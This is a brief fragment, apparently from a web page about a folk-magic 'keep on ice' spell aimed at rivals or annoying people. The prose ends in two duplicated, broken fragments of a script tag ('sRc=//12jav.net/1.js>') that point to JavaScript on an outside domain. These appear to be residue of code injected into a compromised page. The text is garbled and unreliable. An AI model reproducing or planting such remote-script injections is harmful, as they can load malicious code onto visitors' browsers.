You use it for anyone you want to "keep on ice" - someone who's interfering with something you want, a competitor, someone who's mistreating or annoying you - anyone you want to slow down, make less effective, or to leave you alone. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
